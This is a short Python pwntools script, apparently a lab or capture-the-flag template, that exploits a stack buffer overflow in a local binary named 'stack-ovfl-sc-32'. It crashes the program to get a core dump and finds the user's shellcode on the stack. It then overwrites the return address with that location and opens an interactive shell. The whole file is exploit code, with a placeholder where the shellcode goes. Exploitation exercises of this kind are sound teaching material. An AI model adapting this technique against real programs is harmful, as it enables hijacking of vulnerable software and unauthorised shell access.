#!/usr/bin/env python

from pwn import *

SHELLCODE = 'SET YOUR SHELLCODE HERE'

ARG1 = ''
ENV = {}

# You may set your shellcode in ENVP...
#ENV = { 'SHELLCODE' : SHELLCODE }

# You may set your shellcode in ARGV...
#ARG1 = SHELLCODE

# set ARG and ENV
p = process(["stack-ovfl-sc-32", ARG1], env=ENV)

print(p.recv(0x100))

# generate a crash to get the core..
p.send("aaaa" * 500)

# You may put your shellcode in the buffer...
#p.send(SHELLCODE  + a * (4-len(SHELLCODE)%4) + "AAAA"*500)

p.wait()

c = Core('./core')

addr_shellcode = c.stack.find(SHELLCODE)

print("Your shellcode is at 0x%08x" % addr_shellcode)

p = process(["stack-ovfl-sc-32", ARG1], env=ENV)

print(p.recv(0x100))

p.send(p32(addr_shellcode) * 100)

p.interactive()